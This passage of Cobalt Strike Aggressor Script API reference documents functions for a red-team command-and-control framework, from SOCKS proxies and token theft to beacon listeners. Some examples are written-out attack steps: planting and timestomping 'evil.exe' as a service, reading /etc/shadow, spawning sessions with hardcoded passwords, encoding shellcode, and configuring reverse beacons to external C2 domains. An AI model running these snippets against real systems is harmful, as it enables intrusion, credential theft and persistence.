Start a SOCKS proxy server associated with a beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to

$3 - SOCKS version [SOCKS4|SOCKS5] Default: SOCKS4

For SOCKS 5 only:

$4 - enable/disable NoAuth authentication [enableNoAuth|disableNoAuth] Default: enableNoAuth

$5 - username for User/Password authentication [blank|username] Default: Blank

$6 - password for User/Password authentication [blank|password] Default: Blank

$7 - enable logging [enableLogging|disableLogging] Default: disableLogging

Example

alias socksPorts {
bsocks($1, 10401);
bsocks($1, 10402, "SOCKS4");
bsocks($1, 10501, "SOCKS5");
bsocks($1, 10502, "SOCKS5" "enableNoAuth", "", "", "disableLogging");
bsocks($1, 10503, "SOCKS5" "enableNoAuth", "myname", "mypassword", "disableLogging");
bsocks($1, 10504, "SOCKS5" "disableNoAuth", "myname", "mypassword", "enableLogging");
}

Back to Top

bsocks_stop

Stop SOCKS proxy servers associated with the specified Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias stopsocks {
   bsocks_stop($1);
}

Back to Top

bspawn

Ask Beacon to spawn a new session

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the listener to target.

$3 - the architecture to spawn a process for (defaults to current beacon arch)

Example

item "&Spawn" {
   openPayloadHelper(lambda({
      binput($bids, "spawn x86 $1");
      bspawn($bids, $1, "x86");
   }, $bids => $1));
}

Back to Top

bspawnas

Ask Beacon to spawn a session as another user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

$5 - the listener to spawn

Example

bspawnas($1, "CORP", "Administrator", "toor", "my listener");

Back to Top

bspawnto

Change the default program Beacon spawns to inject capabilities into.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the architecture we're modifying the spawnto setting for (x86, x64)

$3 - the program to spawn

Notes

The value you specify for spawnto must work from x86->x86, x86->x64, x64->x86, and x64->x86 contexts. This is tricky. Follow these rules and you'll be OK:

1. Always specify the full path to the program you want Beacon to spawn for its post-ex jobs.

2. Environment variables (e.g., %windir%) are OK within these paths.

3. Do not specify %windir%\system32 or c:\windows\system32 directly. Always use syswow64 (x86) and sysnative (x64). Beacon will adjust these values to system32 if it's necessary.

4. For an x86 spawnto value, you must specify an x86 program. For an x64 spawnto value, you must specify an x64 program.

Example

# let's make everything lame.
on beacon_initial {
   binput($1, "prep session with new spawnto values.");
   bspawnto($1, "x86", "%windir%\\syswow64\\notepad.exe");
   bspawnto($1, "x64", "%windir%\\sysnative\\notepad.exe");
}

Back to Top

bspawnu

Ask Beacon to spawn a session under another process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to spawn this session under

$3 - the listener to spawn

Example

bspawnu($1, 1234, "my listener");

Back to Top

bspunnel

Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward)

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the host of the controller

$3 - the port of the controller

$4 - a file with position-independent code to execute in a temporary process.

Example

bspunnel($1, "127.0.0.1", 4444, script_resource("agent.bin"));

Back to Top

bspunnel_local

Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward). Note: this reverse port forward tunnel traverses through the Beacon chain to the team server and, via the team server, out through the requesting Cobalt Strike client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the host of the controller

$3 - the port of the controller

$4 - a file with position-independent code to execute in a temporary process.

Example

bspunnel_local($1, "127.0.0.1", 4444, script_resource("agent.bin"));

Back to Top

bssh

Ask Beacon to spawn an SSH session.

Arguments

$1 - id for the beacon. This may be an array or a single ID.

$2 - IP address or hostname of the target

$3 - port (e.g., 22)

$4 - username

$5 - password

$6 - (optional) the PID to inject the SSH client into or $null

$7 - (optional) the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
bssh($1, "172.16.20.128", 22, "root", "toor");
Inject into the specified process
bssh($1, "172.16.20.128", 22, "root", "toor", 1234, "x64");

Back to Top

bssh_key

Ask Beacon to spawn an SSH session using the data from a key file. The key file needs to be in the PEM format. If the file is not in the PEM format then make a copy of the file and convert the copy with the following command:

/usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p

Arguments

$1 - id for the beacon. This may be an array or a single ID.

$2 - IP address or hostname of the target

$3 - port (e.g., 22)

$4 - username

$5 - key data (as a string)

$6 - (optional) the PID to inject the SSH client into or $null

$7 - (optional) the architecture of the target PID (x86|x64) or $null

Example

alias myssh {
   $pid = $2;
   $arch = $3;
   $handle = openf("/path/to/key.pem");
   $keydata = readb($handle, -1);
   closef($handle);

   if ($pid >= 0 && ($arch eq "x86" || $arch eq "x64")) {
      bssh_key($1, "172.16.20.128", 22, "root", $keydata, $pid, $arch);
   } else {
      bssh_key($1, "172.16.20.128", 22, "root", $keydata);
   }
};

bstage

REMOVED This function is removed in Cobalt Strike 4.0. Use &beacon_stage_tcp or &beacon_stage_pipe to explicitly stage a payload. Use &beacon_link to link to it.

bsteal_token

Ask Beacon to steal a token from a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to take the token from

Use: bsteal_token [pid]
     bsteal_token [pid] <OpenProcessToken access mask>
 
OpenProcessToken access mask suggested values:
  blank = default (TOKEN_ALL_ACCESS)
0 = TOKEN_ALL_ACCESS
11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY (1+2+8)
Access mask values:
STANDARD_RIGHTS_REQUIRED . . . . : 983040
TOKEN_ASSIGN_PRIMARY . . . . . . : 1
TOKEN_DUPLICATE . . . . . . . . : 2
TOKEN_IMPERSONATE . . . . . . . : 4
TOKEN_QUERY . . . . . . . . . . : 8
TOKEN_QUERY_SOURCE . . . . . . . : 16
TOKEN_ADJUST_PRIVILEGES . . . . : 32
TOKEN_ADJUST_GROUPS . . . . . . : 64
TOKEN_ADJUST_DEFAULT . . . . . . : 128
TOKEN_ADJUST_SESSIONID . . . . . : 256

 

NOTE:

'OpenProcessToken access mask' can be helpful for stealing tokens from processes using 'SYSTEM' user and you have this error: Could not open process token: {pid} (5)

You can set your preferred default with '.steal_token_access_mask' in the Malleable C2 global options.

Example

alias steal_token {
   bsteal_token($1, int($2));
}

Back to Top

bsudo

Ask Beacon to run a command via sudo (SSH sessions only)

Arguments

$1 - the id for the session. This may be an array or a single ID.

$2 - the password for the current user

$3 - the command and arguments to run

Example

# hashdump [password]
ssh_alias hashdump {
   bsudo($1, $2, "cat /etc/shadow");
}

Back to Top

bsyscall_method

Ask Beacon to change its syscall method.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the syscall method. Supported methods are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

NOTE:

If the $2 argument is empty, Beacon is tasked to query the currently used syscall method.

Example

alias syscall_method {
bsyscall_method($1, $2);
}

Back to Top

btask

Report a task acknowledgement for a Beacon. This task acknowledgement will also contribute to the narrative in Cobalt Strike's Activity Report and Sessions Report.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

$3 - a string with MITRE ATT&CK Tactic IDs. Use a comma and a space to specify multiple IDs in one string.

https://attack.mitre.org

Example

alias foo {
   btask($1, "User tasked beacon to foo", "T1015");
}

Back to Top

btimestomp

Ask Beacon to change the file modified/accessed/created times to match another file.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to update timestamp values for

$3 - the file to grab timestamp values from

Example

alias persist {
   bcd($1, "c:\\windows\\system32");
   bupload($1, script_resource("evil.exe"));
   btimestomp($1, "evil.exe", "cmd.exe");
   bshell($1, 'sc create evil binpath= "c:\\windows\\system32\\evil.exe"');
   bshell($1, 'sc start evil');
}

Back to Top

btoken_store_remove

Ask Beacon to remove specific access tokens from the store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the array of token IDs to remove.

Example

alias token-store_remove {
btoken_store_remove($1, @(int($2)));
}

Back to Top

btoken_store_remove_all

Ask Beacon to remove all tokens from the store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias token-store_remove_all {
btoken_store_remove_all($1);
}

Back to Top

btoken_store_show

Ask Beacon to print the tokens currently available in the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias token-store_show {
btoken_store_show($1);
}

Back to Top

btoken_store_steal

Ask Beacon to steal a token and store it in the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the array of PIDs to take the tokens from.

$3 - the OpenProcessToken access mask.

Example

alias token-store_steal {
btoken_store_steal($1, @(int($2)), 11);
}

Back to Top

btoken_store_steal_and_use

Ask Beacon to steal a token, store it and immediately apply it to the beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to take the token from.

$3 - the OpenProcessToken access mask.

Example

alias token-store_steal_and_use {
btoken_store_steal_and_use($1, int($2), 11);
}

Back to Top

btoken_store_use

Ask Beacon to use a token from the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the token ID.

Example

alias token-store_use {
btoken_store_use($1, int($2));
}

Back to Top

bunlink

Ask Beacon to delink a Beacon its connected to over a TCP socket or named pipe.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target host to unlink (specified as an IP address)

$3 - (optional) the PID of the target session to unlink

Example

bunlink($1, "172.16.48.3");

Back to Top

bupload

Ask a Beacon to upload a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the file to upload

Example

bupload($1, script_resource("evil.exe"));

Back to Top

bupload_raw

Ask a Beacon to upload a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the remote file name of the file

$3 - the raw content of the file

$4 - (optional) the local path to the file (if there is one)

Example

$data = artifact("my listener", "exe");
bupload_raw($1, "\\\\DC\\C$\\foo.exe", $data);

bwdigest

REMOVED Removed in Cobalt Strike 4.0. Use &bmimikatz directly.

bwinrm

REMOVED Removed in Cobalt Strike 4.0. Use &bjump with winrm or winrm64 built-in options.

bwmi

REMOVED Removed in Cobalt Strike 4.0.

Back to Top

call

Issue a call to the team server.

Arguments

$1 - the command name

$2 - a callback to receive a response to this request. The callback will receive two arguments. The first is the call name. The second is the response.

... - one or more arguments to pass into this call.

Example

call("aggressor.ping", { warn(@_); }, "this is my value");

Back to Top

closeClient

Close the current Cobalt Strike team server connection.

Example

closeClient();

Back to Top

colorPanel

Generate a Java component to set accent colors within Cobalt Strike's data model

Arguments

$1 - the prefix

$2 - an array of IDs to change colors for

Example

popup targets {
   menu "&Color" {
      insert_component(colorPanel("targets", $1));
   }
}
See also

&highlight

Back to Top

credential_add

Add a credential to the data model

Arguments

$1 - username

$2 - password

$3 - realm

$4 - source

$5 - host

Example

command falsecreds {
   for ($x = 0; $x < 100; $x++) {
      credential_add("user $+ $x", "password $+ $x");
   }
}

Back to Top

credentials

Returns a list of application credentials in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each credential entry.

Example

printAll(credentials());

Back to Top

custom_event

Broadcast a custom event to all Cobalt Strike clients.

Arguments

$1 - the topic name

$2 - the event data

Example

custom_event("my-topic", %(foo => 42, bar => "hello"));

Back to Top

custom_event_private

Send a custom event to one specific Cobalt Strike client.

Arguments

$1 - who to send the custom event to

$2 - the topic name

$3 - the event data

Example

custom_event_private("neo", "my-topic", 42);

Back to Top

data_keys

List the query-able keys from Cobalt Strike's data model

Returns

A list of keys that you may query with &data_query

Example

foreach $key (data_keys()) {
   println("\n\c4=== $key ===\n");
   println(data_query($key));
}

Back to Top

data_query

Queries Cobalt Strike's data model

Arguments

$1 - the key to pull from the data model

Returns

A Sleep representation of the queried data.

Example

println(data_query("targets"));

Back to Top

dbutton_action

Adds an action button to a &dialog. When this button is pressed, the dialog closes and its callback is called. You may add multiple buttons to a dialog. Cobalt Strike will line these buttons up in a row and center them at the bottom of the dialog.

Arguments

$1 - the $dialog object

$2 - the button label

Example

dbutton_action($dialog, "Start");
dbutton_action($dialog, "Stop");

Back to Top

dbutton_help

Adds a Help button to a &dialog. When this button is pressed, Cobalt Strike will open the user's browser to the specified URL.

Arguments

$1 - the $dialog object

$2 - the URL to go to

Example

dbutton_help($dialog, "http://www.google.com");

Back to Top

dialog

Create a dialog. Use &dialog_show to show it.

Arguments

$1 - the title of the dialog

$2 - a %dictionary mapping row names to default values

$3 - a callback function. Called when the user presses a &dbutton_action button. $1 is a reference to the dialog. $2 is the button name. $3 is a dictionary that maps each row's name to its value.

Returns

A scalar with a $dialog object.

Example

sub callback {
   # prints: Pressed Go, a is: Apple
   println("Pressed $2 $+ , a is: " . $3['a']);
}

$dialog = dialog("Hello World", %(a => "Apple", b => "Bat"), &callback);
drow_text($dialog, "a", "Fruit:  ");
drow_text($dialog, "b", "Rodent: ");
dbutton_action($dialog, "Go");
dialog_show($dialog);

Back to Top

dialog_description

Adds a description to a &dialog

Arguments

$1 - a $dialog object

$2 - the description of this dialog

$3 - (optional) the number of lines of text to show for the description of this dialog. When it is not specified two lines of text are shown for the description of this dialog. The maximum number of lines that can be shown is 20.

Example

dialog_description($dialog, "I am the Hello World dialog.");
dialog_description($dialog, "I am the Hello World dialog.", 2);

xxxx bbbbb xxxxx

<span class="code">bbbbb</span>

Back to Top

dialog_show

Shows a &dialog.

Arguments

$1 - the $dialog object

Example

dialog_show($dialog);

Back to Top

dispatch_event

Call a function in Java Swing's Event Dispatch Thread. Java's Swing Library is not thread safe. All changes to the user interface should happen from the Event Dispatch Thread.

Arguments

$1 - the function to call

Example

dispatch_event({
   println("Hello World"); 
});

Back to Top

downloads

Returns a list of downloads in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each downloaded file.

Example

printAll(downloads());

Back to Top

drow_beacon

Adds a beacon selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_beacon($dialog, "bid", "Session: ");

Back to Top

drow_checkbox

Adds a checkbox to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - the text next to the checkbox

Example

drow_checkbox($dialog, "box", "Scary: ", "Check me... if you dare");

Back to Top

drow_combobox

Adds a combobox to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - an array of options to choose from

Example

drow_combobox($dialog, "combo", "Options", @("apple", "bat", "cat"));

Back to Top

drow_exploits

Adds a privilege escalation exploit selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_exploits($dialog, "exploit", "Exploit: ");

Back to Top

drow_file

Adds a file chooser row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_file($dialog, "file", "Choose: ");

Back to Top

drow_interface

Adds a VPN interface selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_interface($dialog, "int", "Interface: ");

Back to Top

drow_krbtgt

Adds a krbtgt selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_krbtgt($dialog, "hash", "krbtgt hash: ");

Back to Top

drow_listener

Adds a listener selection row to a &dialog. This row only shows listeners with stagers (e.g., windows/beacon_https/reverse_https).

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_listener($dialog, "listener", "Listener: ");

Back to Top

drow_listener_smb

DEPRECATED This function is deprecated in Cobalt Strike 4.0. It's now equivalent to &drow_listener_stage

Back to Top

drow_listener_stage

Adds a listener selection row to a &dialog. This row shows all Beacon and Foreign listener payloads.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_listener_stage($dialog, "listener", "Stage: ");

Back to Top

drow_mailserver

Adds a mail server field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_mailserver($dialog, "mail", "SMTP Server: ");

Back to Top

drow_proxyserver

DEPRECATED This function is deprecated in Cobalt Strike 4.0. The proxy configuration is now tied directly to the listener.

Adds a proxy server field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_proxyserver($dialog, "proxy", "Proxy: ");

Back to Top

drow_site

Adds a site/URL field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_site($dialog, "url", "Site: ");

Back to Top

drow_text

Adds a text field row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - (optional) The width of this text field (in characters). This value isn't always honored (it won't shrink the field, but it will make it wider).

Example

drow_text($dialog, "name", "Name: ");

Back to Top

drow_text_big

Adds a multi-line text field to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_text_big($dialog, "addr", "Address: ");

Back to Top

dstamp

Format a time into a date/time value. This value includes seconds.

Arguments

$1 - the time [milliseconds since the UNIX epoch]

Example

println("The time is now: " . dstamp(ticks()));
See also

&tstamp

Back to Top

elog

Publish a notification to the event log

Arguments

$1 - the message

Example

elog("The robot invasion has begun!");

Back to Top

encode

Obfuscate a position-independent blob of code with an encoder.

Arguments

$1 - position independent code (e.g., shellcode, "raw" stageless Beacon) to apply encoder to

$2 - the encoder to use

$3 - the architecture (e.g., x86, x64)

Encoder Description
alpha Alphanumeric encoder (x86-only)
xor XOR encoder

Notes

  • The encoded position-independent blob must run from a memory page that has RWX permissions or the decode step will crash the current process.
  • alpha encoder: The EDI register must contain the address of the encoded blob. &encode prepends a 10-byte (non-alphanumeric) program to the beginning of the alphanumeric encoded blob. This program calculates the location of the encoded blob and sets EDI for you. If you plan to set EDI yourself, you may remove these first 10 bytes.

Returns

A position-independent blob that decodes the original string and passes execution to it.

Example

# generate shellcode for a listener
$stager = shellcode("my listener", false "x86");

# encode it.
$stager = encode($stager, "xor", "x86");

Back to Top

extract_reflective_loader

Extract the executable code for a reflective loader from a Beacon Object File (BOF).

Arguments

$1 - Beacon Object File data that contains a reflective loader.

Returns

The Reflective Loader binary executable code extracted from the Beacon Object File data.

Example

See BEACON_RDLL_GENERATE hook

# ---------------------------------------------------------------------
# extract loader from BOF.
# ---------------------------------------------------------------------
$loader = extract_reflective_loader($data);

Back to Top

file_browser

Open the File Browser. This function does not have any parameters.

Back to Top

fireAlias

Runs a user-defined alias

Arguments

$1 - the beacon id to run the alias against

$2 - the alias name to run

$3 - the arguments to pass to the alias.

Example

# run the foo alias when a new Beacon comes in
on beacon_initial {
   fireAlias($1, "foo", "bar!");
}

Back to Top

fireEvent

Fire an event.

Arguments

$1 - the event name

... - the event arguments.

Example

on foo {
   println("Argument is: $1");
}

fireEvent("foo", "Hello World!");

Back to Top

format_size

Formats a number into a size (e.g., 1024 => 1kb)

Arguments

$1 - the size to format

Returns

A string representing a human readable data size.

Example

println(format_size(1024));

Back to Top

getAggressorClient

Returns the aggressor.AggressorClient Java object. This can reach anything internal within the current Cobalt Strike client context.

Example

$client = getAggressorClient();

Back to Top

get_postex_kit_callback_id

Returns the id constant for the PostEx kit message type.

See also

&beacon_execute_postex_job

Postex Kit

Back to Top

gunzip

Decompress a string (GZIP).

Arguments

$1 - the string to compress

Returns

The argument processed by the gzip de-compressor

Example

println(gunzip(gzip("this is a test")));
See also

&gzip

Back to Top

gzip

GZIP a string.

Arguments

$1 - the string to compress

Returns

The argument processed by the gzip compressor

Example

println(gzip("this is a test"));
See also

&gunzip

Back to Top

highlight

Insert an accent (color highlight) into Cobalt Strike's data model

Arguments

$1 - the data model

$2 - an array of rows to highlight

$3 - the accent type

Notes

  • Data model rows include: applications, beacons, credentials, listeners, services, and targets.
  • Accent options are:
Accent Color
[empty] no highlight
good Green
bad Red
neutral Yellow
ignore Grey
cancel Dark Blue

Example

command admincreds {
   local('@creds');
   
   # find all of our creds that are user Administrator.
   foreach $entry (credentials()) {
      if ($entry['user'] eq "Administrator") {
         push(@creds, $entry);
      }
   }
   
   # highlight all of them green!
   highlight("credentials", @creds, "good");
}

Back to Top

host_delete

Delete a host from the targets model

Arguments

$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]

Example

# clear all hosts
host_delete(hosts());

Back to Top

host_info

Get information about a target.

Arguments

$1 - the host IPv4 or IPv6 address

$2 - [Optional] the key to extract a value for

Returns

%info = host_info("address");

Returns a dictionary with known information about this target.

$value = host_info("address", "key");

Returns the value for the specified key from this target's entry in the data model.

Example

# create a script console alias to dump host info
command host {
   println("Host $1");
   foreach $key => $value (host_info($1)) {
      println("$[15]key $value");
   }
}

Back to Top

host_update

Add or update a host in the targets model

Arguments

$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]

$2 - the DNS name of this target

$3 - the target's operating system

$4 - the operating system version number (e.g., 10.0)

$5 - a note for the target.

Note

You may specify a $null value for any argument and, if the host exists, no change will be made to that value.

Example

host_update("192.168.20.3", "DC", "Windows", 10.0);

Back to Top

hosts

Returns a list of IP addresses from Cobalt Strike's target model

Returns

An array of IP addresses

Example

printAll(hosts());

Back to Top

insert_component

Add a javax.swing.JComponent object to the menu tree

Arguments

$1 - the component to add

Back to Top

insert_menu

Bring menus associated with a popup hook into the current menu tree.

Arguments

$1 - the popup hook

... - additional arguments are passed to the child popup hook.

Example

popup beacon {
   # menu definitions above this point
   
   insert_menu("beacon_bottom", $1);
   
   # menu definitions below this point
}

Back to Top

iprange

Generate an array of IPv4 addresses based on a string description

Arguments

$1 - a string with a description of IPv4 ranges

Range Result
192.168.1.2 The IP4 address 192.168.1.2
192.168.1.1, 192.168.1.2 The IPv4 addresses 192.168.1.1 and 192.168.1.2
192.168.1.0/24 The IPv4 addresses 192.168.1.0 through 192.168.1.255
192.168.1.18-192.168.1.30 The IPv4 addresses 192.168.1.18 through 192.168.1.29
192.168.1.18-30 The IPv4 addresses 192.168.1.18 through 192.168.1.29

Returns

An array of IPv4 addresses within the specified ranges.

Example

printAll(iprange("192.168.1.0/25"));

Back to Top

keystrokes

Returns a list of keystrokes from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about recorded keystrokes.

Example

printAll(keystrokes());

Back to Top

licenseKey

DEPRECATED This function is deprecated in Cobalt Strike 4.6. The function will now return an empty string.

Get the license key for this instance of Cobalt Strike

Returns

Your license key.

Example

println("Your key is: " . licenseKey());

Back to Top

listener_create

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &listener_create_ext

Create a new listener.

Arguments

$1 - the listener name

$2 - the payload (e.g., windows/beacon_http/reverse_http)

$3 - the listener host

$4 - the listener port

$5 - a comma separated list of addresses for listener to beacon to

Example

# create a foreign listener
listener_create("My Metasploit", "windows/foreign_https/reverse_https", 
      "ads.losenolove.com", 443);

# create an HTTP Beacon listener
listener_create("Beacon HTTP", "windows/beacon_http/reverse_http",
      "www.losenolove.com", 80, 
      "www.losenolove.com, www2.losenolove.com");

Back to Top

listener_create_ext

Create a new listener.

Arguments

$1 - the listener name

$2 - the payload (e.g., windows/beacon_http/reverse_http)

$3 - a map with key/value pairs that specify options for the listener

Note

The following payload options are valid for $2:

Payload Type
windows/beacon_dns/reverse_dns_txt Beacon DNS
windows/beacon_http/reverse_http Beacon HTTP
windows/beacon_https/reverse_https Beacon HTTPS
windows/beacon_bind_pipe Beacon SMB
windows/beacon_bind_tcp Beacon TCP
windows/beacon_extc2 External C2
windows/foreign/reverse_http Foreign HTTP
windows/foreign/reverse_https Foreign HTTPS

The following keys are valid for $3:

Key DNS HTTP/S SMB TCP (Bind)
althost HTTP Host Header
bindto bind port bind port
beacons c2 hosts c2 hosts bind host
host staging host staging host
maxretry maxretry maxretry    
port c2 port c2 port pipe name port
profile profile variant
proxy proxy config
strategy host rotation host rotation

The following host rotation Values are valid for the 'strategy' Key:

Option
round-robin
random
failover
failover-5x
failover-50x
failover-100x
failover-1m
failover-5m
failover-15m
failover-30m
failover-1h
failover-3h
failover-6h
failover-12h
failover-1d
rotate-1m
rotate-5m
rotate-15m
rotate-30m
rotate-1h
rotate-3h
rotate-6h
rotate-12h
rotate-1d

Note

The maxretry value uses the following syntax of exit-[max_attempts]-[increase_attempts]-[duration][m,h,d]. For example 'exit-10-5-5m' will exit beacon after 10 failed attempts and will increase sleep time after 5 failed attempts to 5 minutes. The sleep time will not be updated if the current sleep time is greater than the specified duration value. The sleep time will be affected by the current jitter value. On a successful connection the failed attempts count will be reset to zero and the sleep time will be reset to the prior value.

The proxy configuration string is the same string you would input into Cobalt Strike's listener dialog. *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:[email protected]:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http. Set the proxy configuration string to $null or "" to use the default behavior.

Example

# create a foreign listener
listener_create_ext("My Metasploit", "windows/foreign/reverse_https",
      %(host => "ads.losenolove.com", port => 443));

# create an HTTP Beacon listener
listener_create_ext("Beacon HTTP", "windows/beacon_http/reverse_http",
      %(host => "www.losenolove.com", port => 80, 
      beacons => "www.losenolove.com, www2.losenolove.com"));

# create an HTTP Beacon listener
listener_create_ext("HTTP", "windows/beacon_http/reverse_http",
      %(host => "stage.host",
      profile => "default",
      port => 80,
      beacons => "b1.host,b2.host",
      althost => "alt.host",
      bindto => 8080,
      strategy => "failover-5x",
      max_retry => "exit-10-5-5m",
      proxy => "proxy.host"));

Back to Top

listener_delete

Stop and remove a listener.

Arguments

$1 - the listener name

Example

listener_delete("Beacon HTTP");

Back to Top

listener_describe

Describe a listener.

Arguments

$1 - the listener name

$2 - (optional) the remote target the listener is destined for

Returns

A string describing the listener

Example

foreach $name (listeners()) {
   println("$name is: " . listener_describe($name));
}

Back to Top

listener_info

Get information about a listener.

Arguments

$1 - the listener name

$2 - (optional) the key to extract a value for

Returns

%info = listener_info("listener name");

Returns a dictionary with the metadata for this listener.

$value = listener_info("listener name", "key");

Returns the value for the specified key from this listener's metadata

Example

# create a script console alias to dump listener info
command dump {
   println("Listener $1");
   foreach $key => $value (listener_info($1)) {
      println("$[15]key $value");
   }
}

Back to Top

listener_pivot_create

Create a new pivot listener.

Arguments

$1 - the Beacon ID

$2 - the listener name

$3 - the payload (e.g., windows/beacon_reverse_tcp)

$4 - the listener host

$5 - the listener port

Note

The only valid payload argument is windows/beacon_reverse_tcp.

Example

# create a pivot listener: 
# $1 = beaconID, $2 = name, $3 = port
alias plisten {
   local('$lhost $bid $name $port');
   
   # extract our arguments
   ($bid, $name, $port) = @_;
   
   # get the name of our target
   $lhost = beacon_info($1, "computer");
   
   btask($1, "create TCP listener on $lhost $+ : $+ $port");
   listener_pivot_create($1, $name, "windows/beacon_reverse_tcp", $lhost, $port);
}

Back to Top

listener_restart

Restart a listener

Arguments

$1 - the listener name

Example

listener_restart("Beacon HTTP");

Back to Top

listeners

Return a list of listener names (with stagers only!) across all team servers this client is connected to.

Returns

An array of listener names.

Example

printAll(listeners());

Back to Top

listeners_local

Return a list of listener names. This function limits itself to the current team server only. External C2 listener names are omitted.

Returns

An array of listener names.

Example

printAll(listeners_local());

Back to Top

listeners_stageless

Return a list of listener names across all team servers this client is connected to. External C2 listeners are filtered (as they're not actionable via staging or exporting as a Reflective DLL).

Returns

An array of listener names.

Example

printAll(listeners_stageless());

Back to Top

localip

Get the IP address associated with the team server.

Returns

A string with the team server's IP address.

Example

println("I am: " . localip());

Back to Top

menubar

Add a top-level item to the menubar.

Arguments

$1 - the description

$2 - the popup hook

Example

popup mythings {
   item "Keep out" {
   }
}

menubar("My &Things", "mythings");

Back to Top

mynick

Get the nickname associated with the current Cobalt Strike client.

Returns

A string with your nickname.

Example

println("I am: " . mynick());

Back to Top

nextTab

Activate the tab that is to the right of the current tab.

Example

bind Ctrl+Right {
   nextTab();
}

Back to Top

on

Register an event handler. This is an alternate to the on keyword.

Arguments

$1 - the name of the event to respond to

$2 - a callback function. Called when the event happens.

Example

sub foo {
   blog($1, "Foo!");
}

on("beacon_initial", &foo);

Back to Top

openAboutDialog

Open the "About Cobalt Strike" dialog

Example

openAboutDialog();

Back to Top

openApplicationManager

Open the application manager (system profiler results) tab.

Example

openApplicationManager();

Back to Top

openAutoRunDialog

Open the auto run dialog.

Example

openAutoRunDialog();

Back to Top

openBeaconBrowser

Open the beacon browser tab.

Example

openBeaconBrowser();

Back to Top

openBeaconConsole

Open the console to interact with a Beacon

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Interact" {
   local('$bid');
   foreach $bid ($1) {
      openBeaconConsole($bid);
   }
}

Back to Top

openBrowserPivotSetup

open the browser pivot setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Browser Pivoting" {
   local('$bid');
   foreach $bid ($1) {
      openBrowserPivotSetup($bid);
   }
}

Back to Top

openBypassUACDialog

REMOVED Removed in Cobalt Strike 4.1.

Back to Top

openCloneSiteDialog

Open the dialog for the website clone tool.

Example

openCloneSiteDialog();

Back to Top

openConnectDialog

Open the connect dialog.

Example

openConnectDialog();

Back to Top

openCovertVPNSetup

open the Covert VPN setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "VPN Pivoting" {
   local('$bid');
   foreach $bid ($1) {
      openCovertVPNSetup($bid);
   }
}

Back to Top

openCredentialManager

Open the credential manager tab.

Example

openCredentialManager();

Back to Top

openDefaultShortcutsDialog

Open the Default Keyboard Shortcuts dialog. This function does not have any parameters.

Back to Top

openDownloadBrowser

Open the download browser tab

Example

openDownloadBrowser();

Back to Top

openElevateDialog

Open the dialog to launch a privilege escalation exploit.

Arguments

$1 - the beacon ID

Example

item "Elevate" {
   local('$bid');
   foreach $bid ($1) {
      openElevateDialog($bid);
   }
}

Back to Top

openEventLog

Open the event log.

Example

# Example using the dispatch_event aggressor script function
on ready {
   # Send the script console tab to the bottom of the cobalt strike window
   dispatch_event({
      $client = getAggressorClient();
      $tabMgr = [$client getTabManager];
      $console = openEventLog();
